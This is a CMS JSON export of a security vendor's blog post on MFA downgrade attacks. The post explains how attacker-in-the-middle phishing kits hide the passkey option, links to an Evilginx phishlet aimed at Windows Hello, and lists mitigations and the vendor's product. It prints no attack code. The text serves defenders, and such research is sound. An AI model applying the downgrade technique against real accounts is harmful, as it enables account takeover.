"data":60914,"content":60915},{"uri":58235},[60916],{"nodeType":173,"value":58238,"marks":60917,"data":60919},[60918],{"type":194},{},{"nodeType":173,"value":58243,"marks":60921,"data":60922},[],{},{"nodeType":178,"data":60924,"content":60925},{},[60926],{"nodeType":173,"value":58250,"marks":60927,"data":60928},[],{},{"nodeType":235,"data":60930,"content":60931},{},[60932],{"nodeType":173,"value":58257,"marks":60933,"data":60935},[60934],{"type":370},{},{"nodeType":178,"data":60937,"content":60938},{},[60939,60942,60949],{"nodeType":173,"value":50021,"marks":60940,"data":60941},[],{},{"nodeType":186,"data":60943,"content":60944},{"uri":50026},[60945],{"nodeType":173,"value":50029,"marks":60946,"data":60948},[60947],{"type":194},{},{"nodeType":173,"value":50034,"marks":60950,"data":60951},[],{},{"nodeType":235,"data":60953,"content":60954},{},[60955],{"nodeType":173,"value":58281,"marks":60956,"data":60958},[60957],{"type":370},{},{"nodeType":178,"data":60960,"content":60961},{},[60962,60965,60972],{"nodeType":173,"value":58289,"marks":60963,"data":60964},[],{},{"nodeType":186,"data":60966,"content":60967},{"uri":50125},[60968],{"nodeType":173,"value":58296,"marks":60969,"data":60971},[60970],{"type":194},{},{"nodeType":173,"value":58301,"marks":60973,"data":60974},[],{},{"nodeType":312,"data":60976,"content":60979},{"target":60977},{"sys":60978},{"id":58308,"type":317,"linkType":318},[],{"nodeType":231,"data":60981,"content":60982},{},[],{"nodeType":169,"data":60984,"content":60985},{},[60986],{"nodeType":173,"value":8967,"marks":60987,"data":60989},[60988],{"type":370},{},{"nodeType":178,"data":60991,"content":60992},{},[60993,60996,61003],{"nodeType":173,"value":58324,"marks":60994,"data":60995},[],{},{"nodeType":186,"data":60997,"content":60998},{"uri":1764},[60999],{"nodeType":173,"value":58331,"marks":61000,"data":61002},[61001],{"type":194},{},{"nodeType":173,"value":58336,"marks":61004,"data":61005},[],{},{"nodeType":178,"data":61007,"content":61008},{},[61009],{"nodeType":173,"value":58343,"marks":61010,"data":61011},[],{},{"nodeType":312,"data":61013,"content":61016},{"target":61014},{"sys":61015},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":61018,"content":61019},{},[],{"nodeType":169,"data":61021,"content":61022},{},[61023],{"nodeType":173,"value":8517,"marks":61024,"data":61026},[61025],{"type":370},{},{"nodeType":178,"data":61028,"content":61029},{},[61030,61033,61040],{"nodeType":173,"value":8538,"marks":61031,"data":61032},[],{},{"nodeType":186,"data":61034,"content":61035},{"uri":6820},[61036],{"nodeType":173,"value":8545,"marks":61037,"data":61039},[61038],{"type":194},{},{"nodeType":173,"value":8550,"marks":61041,"data":61042},[],{},{"nodeType":178,"data":61044,"content":61045},{},[61046],{"nodeType":173,"value":26673,"marks":61047,"data":61048},[],{},{"nodeType":178,"data":61050,"content":61051},{},[61052],{"nodeType":173,"value":58387,"marks":61053,"data":61054},[],{},{"nodeType":312,"data":61056,"content":61059},{"target":61057},{"sys":61058},{"id":58394,"type":317,"linkType":318},[],{"nodeType":178,"data":61061,"content":61062},{},[61063,61066,61073,61076,61083],{"nodeType":173,"value":1451,"marks":61064,"data":61065},[],{},{"nodeType":186,"data":61067,"content":61068},{"uri":1456},[61069],{"nodeType":173,"value":1459,"marks":61070,"data":61072},[61071],{"type":194},{},{"nodeType":173,"value":1464,"marks":61074,"data":61075},[],{},{"nodeType":186,"data":61077,"content":61078},{"uri":1469},[61079],{"nodeType":173,"value":1472,"marks":61080,"data":61082},[61081],{"type":194},{},{"nodeType":173,"value":1477,"marks":61084,"data":61085},[],{},{"items":61087},[61088,61090],{"sys":61089,"name":509},{"id":508},{"sys":61091,"name":505},{"id":504},{"items":61093},[61094],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":61095},{"url":1496},{"__typename":1528,"sys":61097,"content":61099,"title":61754,"synopsis":61755,"hashTags":118,"publishedDate":61756,"slug":61757,"tagsCollection":61758,"authorsCollection":61764},{"id":61098},"7dqGkFzSMA00bIJ94rW4na",{"json":61100},{"nodeType":165,"data":61101,"content":61102},{},[61103,61110,61117,61123,61148,61168,61171,61179,61186,61193,61201,61221,61224,61232,61239,61245,61252,61258,61261,61269,61276,61283,61306,61313,61346,61353,61361,61380,61387,61393,61420,61450,61458,61465,61472,61505,61508,61516,61535,61542,61565,61572,61578,61581,61589,61596,61720,61723,61730,61737],{"nodeType":178,"data":61104,"content":61105},{},[61106],{"nodeType":173,"value":61107,"marks":61108,"data":61109},"As awareness grows around many MFA methods being “phishable” (i.e. not phishing resistant), passwordless authentication methods are being increasingly advocated. ",[],{},{"nodeType":178,"data":61111,"content":61112},{},[61113],{"nodeType":173,"value":61114,"marks":61115,"data":61116},"This is a good thing. The most commonly used MFA factors (like SMS codes, push notifications, and app-based OTP) are routinely bypassed, with modern reverse-proxy phishing kits the most common method. ",[],{},{"nodeType":312,"data":61118,"content":61122},{"target":61119},{"sys":61120},{"id":61121,"type":317,"linkType":318},"ImwzE2R9qaHaqlWn0GqIa",[],{"nodeType":178,"data":61124,"content":61125},{},[61126,61130,61135,61139,61144],{"nodeType":173,"value":61127,"marks":61128,"data":61129},"Often referred to as a “passkey”, passwordless authentication typically consists of a hardware security device that is built-into your laptop (e.g. the fingerprint sensor on a laptop) or something you plug into your device (e.g. a Yubikey). Because passkey-based logins are domain-bound, trying to use a passkey for ",[],{},{"nodeType":173,"value":61131,"marks":61132,"data":61134},"microsoft.com",[61133],{"type":194},{},{"nodeType":173,"value":61136,"marks":61137,"data":61138}," on ",[],{},{"nodeType":173,"value":61140,"marks":61141,"data":61143},"phishing.com",[61142],{"type":194},{},{"nodeType":173,"value":61145,"marks":61146,"data":61147}," simply won’t generate the correct value to pass the authentication check, even when proxied using an AitM kit. ",[],{},{"nodeType":178,"data":61149,"content":61150},{},[61151,61155,61165],{"nodeType":173,"value":61152,"marks":61153,"data":61154},"However, attackers have realized that even as these new phishing-resistant methods are starting to become used, most users still have alternative MFA methods active. The attacker can then do what’s called a ",[],{},{"nodeType":186,"data":61156,"content":61158},{"uri":61157},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/mfa_downgrade/description.md",[61159],{"nodeType":173,"value":61160,"marks":61161,"data":61164},"downgrade attack",[61162,61163],{"type":194},{"type":370},{},{"nodeType":173,"value":1477,"marks":61166,"data":61167},[],{},{"nodeType":231,"data":61169,"content":61170},{},[],{"nodeType":169,"data":61172,"content":61173},{},[61174],{"nodeType":173,"value":61175,"marks":61176,"data":61178},"Downgrade attacks 101",[61177],{"type":370},{},{"nodeType":178,"data":61180,"content":61181},{},[61182],{"nodeType":173,"value":61183,"marks":61184,"data":61185},"When conducting an Attacker-in-the-Middle phishing attack, the attacker doesn’t need to relay 100% of the messages accurately. Instead, they can alter some of them. The app might ask the user “You need to MFA — do you want to use your passkey, or your backup authenticator code?”, but the phishing website might modify this page to say “You need to MFA — use your backup authenticator code” not giving you the option to use your secure passkey. This is called a downgrade attack.",[],{},{"nodeType":178,"data":61187,"content":61188},{},[61189],{"nodeType":173,"value":61190,"marks":61191,"data":61192},"This can also be applied to accounts that use SSO as the default login method. In this scenario, the phish kit can select a backup username and password option to allow the phishing attack to proceed.  ",[],{},{"nodeType":178,"data":61194,"content":61195},{},[61196],{"nodeType":173,"value":61197,"marks":61198,"data":61200},"So, you have a situation where even if a phishing-resistant login method exists, the presence of a less secure backup method means the account is still vulnerable to phishing attacks. ",[61199],{"type":370},{},{"nodeType":178,"data":61202,"content":61203},{},[61204,61208,61217],{"nodeType":173,"value":61205,"marks":61206,"data":61207},"These attacks are effective across a number of sites and login methods that support passkey-based logins, for example, Windows Hello, Okta FastPass, and Google Workspace. As an example, here’s a link to a ",[],{},{"nodeType":186,"data":61209,"content":61211},{"uri":61210},"https://github.com/yudasm/WHfB-o365-Phishlet",[61212],{"nodeType":173,"value":61213,"marks":61214,"data":61216},"custom phishlet for Evilginx",[61215],{"type":194},{},{"nodeType":173,"value":61218,"marks":61219,"data":61220}," targeting Windows Hello for Business. A small caveat is that changes made by Microsoft have since broken this plugin, but we were able to write our own custom phishlet to achieve the same outcome. ",[],{},{"nodeType":231,"data":61222,"content":61223},{},[],{"nodeType":169,"data":61225,"content":61226},{},[61227],{"nodeType":173,"value":61228,"marks":61229,"data":61231},"MFA downgrade in action",[61230],{"type":370},{},{"nodeType":178,"data":61233,"content":61234},{},[61235],{"nodeType":173,"value":61236,"marks":61237,"data":61238},"Check out the video below to see an example of using Evilginx with a custom phishlet to downgrade authentication for a Microsoft account using Windows Hello. ",[],{},{"nodeType":312,"data":61240,"content":61244},{"target":61241},{"sys":61242},{"id":61243,"type":317,"linkType":318},"54I3YQ2gK26a8FIocQ3WYT",[],{"nodeType":178,"data":61246,"content":61247},{},[61248],{"nodeType":173,"value":61249,"marks":61250,"data":61251},"We’ve encountered similar functionality in criminal phishing platforms we’ve investigated such as Tycoon — in this case, targeting Google accounts. This snippet is notable in that it includes JavaScript to abuse UI features to bypass passkeys.",[],{},{"nodeType":312,"data":61253,"content":61257},{"target":61254},{"sys":61255},{"id":61256,"type":317,"linkType":318},"5Vya1VApSisr0000HuTLY2",[],{"nodeType":231,"data":61259,"content":61260},{},[],{"nodeType":169,"data":61262,"content":61263},{},[61264],{"nodeType":173,"value":61265,"marks":61266,"data":61268},"Mitigations (and challenges)",[61267],{"type":370},{},{"nodeType":178,"data":61270,"content":61271},{},[61272],{"nodeType":173,"value":61273,"marks":61274,"data":61275},"MFA downgrade is made possible by the existence of backup authentication methods. So the obvious solution is to remove backup/unused login and MFA methods from your accounts, ensuring you’re accessing apps using SSO from a hardened Identity Provider (IdP) account (e.g. Okta, Entra, Google Workspace). ",[],{},{"nodeType":178,"data":61277,"content":61278},{},[61279],{"nodeType":173,"value":61280,"marks":61281,"data":61282},"In the ideal world, you’d be:",[],{},{"nodeType":250,"data":61284,"content":61285},{},[61286,61296],{"nodeType":254,"data":61287,"content":61288},{},[61289],{"nodeType":178,"data":61290,"content":61291},{},[61292],{"nodeType":173,"value":61293,"marks":61294,"data":61295},"Using only one IdP account, which you access via passkey, with no backup methods.",[],{},{"nodeType":254,"data":61297,"content":61298},{},[61299],{"nodeType":178,"data":61300,"content":61301},{},[61302],{"nodeType":173,"value":61303,"marks":61304,"data":61305},"Accessing all business apps using SSO from your locked-down IdP account. ",[],{},{"nodeType":178,"data":61307,"content":61308},{},[61309],{"nodeType":173,"value":61310,"marks":61311,"data":61312},"The reality is way different, though. Because going totally passwordless is hard. It requires a large investment of time, money, and training for end-users. You’ll find many cautionary tales of companies starting on their passkey adoption journey and ultimately failing to make it a reality. This is largely because:",[],{},{"nodeType":250,"data":61314,"content":61315},{},[61316,61326,61336],{"nodeType":254,"data":61317,"content":61318},{},[61319],{"nodeType":178,"data":61320,"content":61321},{},[61322],{"nodeType":173,"value":61323,"marks":61324,"data":61325},"In environments with a mix of older and newer infrastructure, it can be challenging to get complete coverage. ",[],{},{"nodeType":254,"data":61327,"content":61328},{},[61329],{"nodeType":178,"data":61330,"content":61331},{},[61332],{"nodeType":173,"value":61333,"marks":61334,"data":61335},"Not every device comes with an in-built biometric identification method, so you need to use a second device — which employees may struggle with (especially when they lose it and aren’t familiar with how to regain account access).",[],{},{"nodeType":254,"data":61337,"content":61338},{},[61339],{"nodeType":178,"data":61340,"content":61341},{},[61342],{"nodeType":173,"value":61343,"marks":61344,"data":61345},"Most apps don’t allow you to log in directly with a passkey, meaning you need to SSO from your IdP account. But many apps don’t support every preferred SSO provider, and fail to provide SAML support, so there can be gaps.  ",[],{},{"nodeType":178,"data":61347,"content":61348},{},[61349],{"nodeType":173,"value":61350,"marks":61351,"data":61352},"And ultimately, because of the self-service, product-led growth fuelled nature of most online services today, it’s easy for users to slip back into using passwords — and hard for security teams to find and remove them (particularly if an app isn’t centrally managed). And the level of support that different apps provide users and administrators to secure how they access their services varies significantly. ",[],{},{"nodeType":235,"data":61354,"content":61355},{},[61356],{"nodeType":173,"value":61357,"marks":61358,"data":61360},"Most apps make removing phishable authentication hard",[61359],{"type":370},{},{"nodeType":178,"data":61362,"content":61363},{},[61364,61368,61376],{"nodeType":173,"value":61365,"marks":61366,"data":61367},"While some providers are taking steps to go passwordless by default, which makes it easier to remove passwords (e.g. ",[],{},{"nodeType":186,"data":61369,"content":61371},{"uri":61370},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/introducing-password-removal-for-microsoft-accounts/2747280",[61372],{"nodeType":173,"value":1255,"marks":61373,"data":61375},[61374],{"type":194},{},{"nodeType":173,"value":61377,"marks":61378,"data":61379}," recently made a big deal of its desire to get rid of passwords), the quality of identity security management functionality varies significantly from app to app. ",[],{},{"nodeType":178,"data":61381,"content":61382},{},[61383],{"nodeType":173,"value":61384,"marks":61385,"data":61386},"Many apps default to the most recently used or strongest login method, but very few automatically lock you in to using the strongest method available. Most of the time, these kinds of controls also need to be configured in the app — which can be challenging if your security team doesn’t manage it (or simply isn’t aware of it). ",[],{},{"nodeType":312,"data":61388,"content":61392},{"target":61389},{"sys":61390},{"id":61391,"type":317,"linkType":318},"4X9MR0CbSMltOmw767XNOm",[],{"nodeType":178,"data":61394,"content":61395},{},[61396,61400,61405,61409,61416],{"nodeType":173,"value":61397,"marks":61398,"data":61399},"Finally, configuring MFA is often an additive process — you start by adding a phone number, then you add an authenticator app or a passkey. Just like we find that most accounts with SSO ",[],{},{"nodeType":173,"value":61401,"marks":61402,"data":61404},"also",[61403],{"type":370},{},{"nodeType":173,"value":61406,"marks":61407,"data":61408}," have a password login configured (also known as ",[],{},{"nodeType":186,"data":61410,"content":61411},{"uri":832},[61412],{"nodeType":173,"value":835,"marks":61413,"data":61415},[61414],{"type":194},{},{"nodeType":173,"value":61417,"marks":61418,"data":61419},"), most accounts with MFA typically have multiple methods attached to their account. ",[],{},{"nodeType":178,"data":61421,"content":61422},{},[61423,61427,61434,61437,61446],{"nodeType":173,"value":61424,"marks":61425,"data":61426},"The result is that even if you can successfully lock down a handful of apps, many more will continue to be susceptible to phishing attacks using commonly available downgrade functionality. And as attackers diversify the apps they target (such as these recent examples targeting ",[],{},{"nodeType":186,"data":61428,"content":61429},{"uri":14287},[61430],{"nodeType":173,"value":14290,"marks":61431,"data":61433},[61432],{"type":194},{},{"nodeType":173,"value":933,"marks":61435,"data":61436},[],{},{"nodeType":186,"data":61438,"content":61440},{"uri":61439},"https://pushsecurity.com/blog/dissecting-a-recent-mailchimp-phishing-attack/",[61441],{"nodeType":173,"value":61442,"marks":61443,"data":61445},"MailChimp",[61444],{"type":194},{},{"nodeType":173,"value":61447,"marks":61448,"data":61449},"), this becomes increasingly likely. ",[],{},{"nodeType":235,"data":61451,"content":61452},{},[61453],{"nodeType":173,"value":61454,"marks":61455,"data":61457},"Conditional access is a useful mitigation if configured properly, but only on apps which support it",[61456],{"type":370},{},{"nodeType":178,"data":61459,"content":61460},{},[61461],{"nodeType":173,"value":61462,"marks":61463,"data":61464},"Conditional access policies are a useful last line of defense against account takeover attacks by denying logins that don't meet certain criteria, even if they user is able to authenticate. In larger IdP platforms that typically support more granular conditional access policies, this is a useful addition when configured correctly. However, many apps simply don't support conditional access, so will be vulnerable to attackers targeting them directly (as opposed to first logging into e.g. Microsoft or Google, and then accessing downstream apps via SSO). ",[],{},{"nodeType":178,"data":61466,"content":61467},{},[61468],{"nodeType":173,"value":61469,"marks":61470,"data":61471},"That said, locking down your core IdP platforms with robust conditional access should be a top priority for security teams. Useful policies that should be configured include:",[],{},{"nodeType":250,"data":61473,"content":61474},{},[61475,61485,61495],{"nodeType":254,"data":61476,"content":61477},{},[61478],{"nodeType":178,"data":61479,"content":61480},{},[61481],{"nodeType":173,"value":61482,"marks":61483,"data":61484},"Limiting logins to domain-joined devices.",[],{},{"nodeType":254,"data":61486,"content":61487},{},[61488],{"nodeType":178,"data":61489,"content":61490},{},[61491],{"nodeType":173,"value":61492,"marks":61493,"data":61494},"Set phishing-resistant MFA as required. ",[],{},{"nodeType":254,"data":61496,"content":61497},{},[61498],{"nodeType":178,"data":61499,"content":61500},{},[61501],{"nodeType":173,"value":61502,"marks":61503,"data":61504},"(Where possible) limit logins to trusted IP ranges. ",[],{},{"nodeType":231,"data":61506,"content":61507},{},[],{"nodeType":169,"data":61509,"content":61510},{},[61511],{"nodeType":173,"value":61512,"marks":61513,"data":61515},"Tackling MFA downgrade with Push Security",[61514],{"type":370},{},{"nodeType":178,"data":61517,"content":61518},{},[61519,61523,61531],{"nodeType":173,"value":61520,"marks":61521,"data":61522},"Phishing-resistant authentication methods like passkeys are key to the future of enterprise identity security, but organizations need to recognize that adopting passkeys isn’t a silver bullet. Ensuring that passkeys are the only authentication method supported by your business apps is no mean feat, considering ",[],{},{"nodeType":186,"data":61524,"content":61525},{"uri":4492},[61526],{"nodeType":173,"value":61527,"marks":61528,"data":61530},"most organizations are using hundreds of them",[61529],{"type":194},{},{"nodeType":173,"value":61532,"marks":61533,"data":61534}," — all with their own specific ways of handling and administering identities. ",[],{},{"nodeType":178,"data":61536,"content":61537},{},[61538],{"nodeType":173,"value":61539,"marks":61540,"data":61541},"That’s why we support a layered defense, providing last-mile protection by:",[],{},{"nodeType":250,"data":61543,"content":61544},{},[61545,61555],{"nodeType":254,"data":61546,"content":61547},{},[61548],{"nodeType":178,"data":61549,"content":61550},{},[61551],{"nodeType":173,"value":61552,"marks":61553,"data":61554},"Intercepting and blocking phishing attacks in the browser to prevent AiTM attacks using downgrade techniques.",[],{},{"nodeType":254,"data":61556,"content":61557},{},[61558],{"nodeType":178,"data":61559,"content":61560},{},[61561],{"nodeType":173,"value":61562,"marks":61563,"data":61564},"Identifying backup MFA and login methods across the business apps your employees use, so they can be removed (individually or through app-level configuration changes).",[],{},{"nodeType":178,"data":61566,"content":61567},{},[61568],{"nodeType":173,"value":61569,"marks":61570,"data":61571},"Here’s how it works.",[],{},{"nodeType":312,"data":61573,"content":61577},{"target":61574},{"sys":61575},{"id":61576,"type":317,"linkType":318},"2uvItnfaOQZHa4a9BIIhRn",[],{"nodeType":231,"data":61579,"content":61580},{},[],{"nodeType":169,"data":61582,"content":61583},{},[61584],{"nodeType":173,"value":61585,"marks":61586,"data":61588},"Further reading",[61587],{"type":370},{},{"nodeType":178,"data":61590,"content":61591},{},[61592],{"nodeType":173,"value":61593,"marks":61594,"data":61595},"MFA downgrade is just one method of getting into an otherwise locked-down account. Attackers are also finding ways to bypass the standard authentication process entirely, through: ",[],{},{"nodeType":250,"data":61597,"content":61598},{},[61599,61633,61666,61686],{"nodeType":254,"data":61600,"content":61601},{},[61602],{"nodeType":178,"data":61603,"content":61604},{},[61605,61608,61617,61621,61630],{"nodeType":173,"value":37,"marks":61606,"data":61607},[],{},{"nodeType":186,"data":61609,"content":61611},{"uri":61610},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/app_specific_password_phishing/description.md",[61612],{"nodeType":173,"value":61613,"marks":61614,"data":61616},"App-specific password phishing",[61615],{"type":194},{},{"nodeType":173,"value":61618,"marks":61619,"data":61620},", where attackers can abuse functionality designed to enable users to log into apps that don’t support modern authentication. (",[],{},{"nodeType":186,"data":61622,"content":61624},{"uri":61623},"https://pushsecurity.com/blog/app-specific-password-phishing/",[61625],{"nodeType":173,"value":61626,"marks":61627,"data":61629},"Read the article for more information here",[61628],{"type":194},{},{"nodeType":173,"value":53584,"marks":61631,"data":61632},[],{},{"nodeType":254,"data":61634,"content":61635},{},[61636],{"nodeType":178,"data":61637,"content":61638},{},[61639,61642,61649,61653,61662],{"nodeType":173,"value":37,"marks":61640,"data":61641},[],{},{"nodeType":186,"data":61643,"content":61644},{"uri":19838},[61645],{"nodeType":173,"value":39940,"marks":61646,"data":61648},[61647],{"type":194},{},{"nodeType":173,"value":61650,"marks":61651,"data":61652},", which sees the victim accept OAuth scopes for an attacker-controlled app integration granting access to the account without needing to directly compromise it. (",[],{},{"nodeType":186,"data":61654,"content":61656},{"uri":61655},"https://pushsecurity.com/blog/how-consent-phishing-is-evolving/",[61657],{"nodeType":173,"value":61658,"marks":61659,"data":61661},"You can read more about recent examples here",[61660],{"type":194},{},{"nodeType":173,"value":61663,"marks":61664,"data":61665},".) ",[],{},{"nodeType":254,"data":61667,"content":61668},{},[61669],{"nodeType":178,"data":61670,"content":61671},{},[61672,61675,61682],{"nodeType":173,"value":37,"marks":61673,"data":61674},[],{},{"nodeType":186,"data":61676,"content":61677},{"uri":9275},[61678],{"nodeType":173,"value":9278,"marks":61679,"data":61681},[61680],{"type":194},{},{"nodeType":173,"value":61683,"marks":61684,"data":61685},", functionally very similar to consent phishing but involving the victim entering a code for authorization. ",[],{},{"nodeType":254,"data":61687,"content":61688},{},[61689],{"nodeType":178,"data":61690,"content":61691},{},[61692,61695,61703,61707,61716],{"nodeType":173,"value":37,"marks":61693,"data":61694},[],{},{"nodeType":186,"data":61696,"content":61698},{"uri":61697},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/cross-idp_impersonation/description.md",[61699],{"nodeType":173,"value":57951,"marks":61700,"data":61702},[61701],{"type":194},{},{"nodeType":173,"value":61704,"marks":61705,"data":61706},", which sees the attacker register a new IdP connected to the victim’s email account that can be used to access connected apps via SSO without directly compromising the primary IdP. (",[],{},{"nodeType":186,"data":61708,"content":61710},{"uri":61709},"https://pushsecurity.com/blog/a-new-class-of-phishing-verification-phishing-and-cross-idp-impersonation/",[61711],{"nodeType":173,"value":61712,"marks":61713,"data":61715},"You can read more about this here",[61714],{"type":194},{},{"nodeType":173,"value":61717,"marks":61718,"data":61719},".)",[],{},{"nodeType":231,"data":61721,"content":61722},{},[],{"nodeType":169,"data":61724,"content":61725},{},[61726],{"nodeType":173,"value":18605,"marks":61727,"data":61729},[61728],{"type":370},{},{"nodeType":178,"data":61731,"content":61732},{},[61733],{"nodeType":173,"value":61734,"marks":61735,"data":61736},"Push Security’s browser-based security platform provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, password spraying and session hijacking using stolen session tokens. You can also use Push to find and fix identity vulnerabilities across every app that your employees use, like: ghost logins; SSO coverage gaps; MFA gaps; weak, breached and reused passwords; risky OAuth integrations; and more.",[],{},{"nodeType":178,"data":61738,"content":61739},{},[61740,61744,61751],{"nodeType":173,"value":61741,"marks":61742,"data":61743},"If you want to learn more about how Push helps you to detect and defeat common identity attack techniques, ",[],{},{"nodeType":186,"data":61745,"content":61746},{"uri":473},[61747],{"nodeType":173,"value":1472,"marks":61748,"data":61750},[61749],{"type":194},{},{"nodeType":173,"value":1477,"marks":61752,"data":61753},[],{},"MFA downgrade: How attackers are getting around phishing-resistant authentication","MFA downgrade attacks are an increasingly common technique used by attackers to bypass phishing-resistant authentication methods registered to an account.","2025-07-21T00:00:00.000Z","mfa-downgrade-attacks",{"items":61759},[61760,61762],{"sys":61761,"name":509},{"id":508},{"sys":61763,"name":505},{"id":504},{"items":61765},[61766],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":61767},{"url":8615},{"items":61769},[61770],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":61771},{"url":1496},{"json":61773,"links":62588},{"nodeType":165,"data":61774,"content":61775},{},[61776,61782,61788,61794,61797,61804,61810,61816,61821,61827,61832,61848,61854,61864,61867,61874,61880,61893,61899,61909,61914,61917,61924,61931,61936,61944,61960,61968,61974,61982,61997,62005,62011,62019,62045,62053,62059,62067,62083,62088,62096,62102,62110,62143,62146,62153,62161,62177,62185,62191,62199,62225,62230,62238,62244,62249,62252,62259,62267,62273,62324,62329,62332,62339,62347,62353,62358,62361,62368,62374,62380,62440,62446,62501,62507,62510,62517,62523,62529,62534,62537,62544,62550,62556,62562],{"nodeType":178,"data":61777,"content":61778},{},[61779],{"nodeType":173,"value":528,"marks":61780,"data":61781},[],{},{"nodeType":178,"data":61783,"content":61784},{},[61785],{"nodeType":173,"value":535,"marks":61786,"data":61787},[],{},{"nodeType":178,"data":61789,"content":61790},{},[61791],{"nodeType":173,"value":542,"marks":61792,"data":61793},[],{},{"nodeType":231,"data":61795,"content":61796},{},[],{"nodeType":169,"data":61798,"content":61799},{},[61800],{"nodeType":173,"value":552,"marks":61801,"data":61803},[61802],{"type":370},{},{"nodeType":178,"data":61805,"content":61806},{},[61807],{"nodeType":173,"value":560,"marks":61808,"data":61809},[],{},{"nodeType":178,"data":61811,"content":61812},{},[61813],{"nodeType":173,"value":567,"marks":61814,"data":61815},[],{},{"nodeType":312,"data":61817,"content":61820},{"target":61818},{"sys":61819},{"id":574,"type":317,"linkType":318},[],{"nodeType":178,"data":61822,"content":61823},{},[61824],{"nodeType":173,"value":580,"marks":61825,"data":61826},[],{},{"nodeType":312,"data":61828,"content":61831},{"target":61829},{"sys":61830},{"id":587,"type":317,"linkType":318},[],{"nodeType":178,"data":61833,"content":61834},{},[61835,61838,61845],{"nodeType":173,"value":593,"marks":61836,"data":61837},[],{},{"nodeType":186,"data":61839,"content":61840},{"uri":598},[61841],{"nodeType":173,"value":601,"marks":61842,"data":61844},[61843],{"type":194},{},{"nodeType":173,"value":606,"marks":61846,"data":61847},[],{},{"nodeType":178,"data":61849,"content":61850},{},[61851],{"nodeType":173,"value":613,"marks":61852,"data":61853},[],{},{"nodeType":178,"data":61855,"content":61856},{},[61857,61860],{"nodeType":173,"value":620,"marks":61858,"data":61859},[],{},{"nodeType":173,"value":624,"marks":61861,"data":61863},[61862],{"type":370},{},{"nodeType":231,"data":61865,"content":61866},{},[],{"nodeType":169,"data":61868,"content":61869},{},[61870],{"nodeType":173,"value":635,"marks":61871,"data":61873},[61872],{"type":370},{},{"nodeType":178,"data":61875,"content":61876},{},[61877],{"nodeType":173,"value":643,"marks":61878,"data":61879},[],{},{"nodeType":178,"data":61881,"content":61882},{},[61883,61886,61890],{"nodeType":173,"value":650,"marks":61884,"data":61885},[],{},{"nodeType":173,"value":654,"marks":61887,"data":61889},[61888],{"type":370},{},{"nodeType":173,"value":659,"marks":61891,"data":61892},[],{},{"nodeType":178,"data":61894,"content":61895},{},[61896],{"nodeType":173,"value":666,"marks":61897,"data":61898},[],{},{"nodeType":178,"data":61900,"content":61901},{},[61902,61905],{"nodeType":173,"value":673,"marks":61903,"data":61904},[],{},{"nodeType":173,"value":677,"marks":61906,"data":61908},[61907],{"type":370},{},{"nodeType":312,"data":61910,"content":61913},{"target":61911},{"sys":61912},{"id":685,"type":317,"linkType":318},[],{"nodeType":231,"data":61915,"content":61916},{},[],{"nodeType":169,"data":61918,"content":61919},{},[61920],{"nodeType":173,"value":694,"marks":61921,"data":61923},[61922],{"type":370},{},{"nodeType":235,"data":61925,"content":61926},{},[61927],{"nodeType":173,"value":702,"marks":61928,"data":61930},[61929],{"type":370},{},{"nodeType":312,"data":61932,"content":61935},{"target":61933},{"sys":61934},{"id":710,"type":317,"linkType":318},[],{"nodeType":178,"data":61937,"content":61938},{},[61939],{"nodeType":173,"value":716,"marks":61940,"data":61943},[61941,61942],{"type":370},{"type":194},{},{"nodeType":178,"data":61945,"content":61946},{},[61947,61950,61957],{"nodeType":173,"value":725,"marks":61948,"data":61949},[],{},{"nodeType":186,"data":61951,"content":61952},{"uri":730},[61953],{"nodeType":173,"value":733,"marks":61954,"data":61956},[61955],{"type":194},{},{"nodeType":173,"value":738,"marks":61958,"data":61959},[],{},{"nodeType":178,"data":61961,"content":61962},{},[61963],{"nodeType":173,"value":745,"marks":61964,"data":61967},[61965,61966],{"type":370},{"type":194},{},{"nodeType":178,"data":61969,"content":61970},{},[61971],{"nodeType":173,"value":754,"marks":61972,"data":61973},[],{},{"nodeType":178,"data":61975,"content":61976},{},[61977],{"nodeType":173,"value":761,"marks":61978,"data":61981},[61979,61980],{"type":370},{"type":194},{},{"nodeType":178,"data":61983,"content":61984},{},[61985,61988,61994],{"nodeType":173,"value":770,"marks":61986,"data":61987},[],{},{"nodeType":186,"data":61989,"content":61990},{"uri":775},[61991],{"nodeType":173,"value":778,"marks":61992,"data":61993},[],{},{"nodeType":173,"value":782,"marks":61995,"data":61996},[],{},{"nodeType":178,"data":61998,"content":61999},{},[62000],{"nodeType":173,"value":789,"marks":62001,"data":62004},[62002,62003],{"type":370},{"type":194},{},{"nodeType":178,"data":62006,"content":62007},{},[62008],{"nodeType":173,"value":798,"marks":62009,"data":62010},[],{},{"nodeType":178,"data":62012,"content":62013},{},[62014],{"nodeType":173,"value":805,"marks":62015,"data":62018},[62016,62017],{"type":370},{"type":194},{},{"nodeType":178,"data":62020,"content":62021},{},[62022,62025,62032,62035,62042],{"nodeType":173,"value":814,"marks":62023,"data":62024},[],{},{"nodeType":186,"data":62026,"content":62027},{"uri":819},[62028],{"nodeType":173,"value":822,"marks":62029,"data":62031},[62030],{"type":194},{},{"nodeType":173,"value":827,"marks":62033,"data":62034},[],{},{"nodeType":186,"data":62036,"content":62037},{"uri":832},[62038],{"nodeType":173,"value":835,"marks":62039,"data":62041},[62040],{"type":194},{},{"nodeType":173,"value":840,"marks":62043,"data":62044},[],{},{"nodeType":178,"data":62046,"content":62047},{},[62048],{"nodeType":173,"value":847,"marks":62049,"data":62052},[62050,62051],{"type":370},{"type":194},{},{"nodeType":178,"data":62054,"content":62055},{},[62056],{"nodeType":173,"value":856,"marks":62057,"data":62058},[],{},{"nodeType":178,"data":62060,"content":62061},{},[62062],{"nodeType":173,"value":863,"marks":62063,"data":62066},[62064,62065],{"type":370},{"type":194},{},{"nodeType":178,"data":62068,"content":62069},{},[62070,62073,62080],{"nodeType":173,"value":872,"marks":62071,"data":62072},[],{},{"nodeType":186,"data":62074,"content":62075},{"uri":832},[62076],{"nodeType":173,"value":835,"marks":62077,"data":62079},[62078],{"type":194},{},{"nodeType":173,"value":883,"marks":62081,"data":62082},[],{},{"nodeType":312,"data":62084,"content":62087},{"target":62085},{"sys":62086},{"id":890,"type":317,"linkT